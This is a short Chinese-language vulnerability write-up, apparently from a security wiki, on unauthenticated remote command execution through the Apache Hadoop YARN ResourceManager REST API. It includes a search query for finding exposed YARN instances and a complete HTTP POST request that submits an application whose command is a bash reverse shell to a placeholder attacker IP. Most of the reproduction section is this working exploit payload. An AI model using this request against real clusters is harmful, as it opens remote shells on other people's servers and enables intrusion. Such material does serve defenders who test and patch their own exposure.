跳转至

Apache Hadoop Yarn RPC 远程命令执行漏洞

漏洞描述

Hadoop Yarn RPC未授权访问漏洞存在于Hadoop Yarn中负责资源管理和任务调度的ResourceManager,成因是该组件为用户提供的RPC服务默认情况下无需认证即可访问,

漏洞影响

Apache Hadoop

网络测绘

app="APACHE-hadoop-YARN"

漏洞复现

主页面

img

验证请求包

POST /ws/v1/cluster/apps HTTP/1.1
Host: 
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 215
Content-Type: application/json

{"application-id": "application_1655112607010_0005", "application-name": "get-shell", "am-container-spec": {"commands": {"command": "/bin/bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/9998 0>&1"}}, "application-type": "YARN"}

img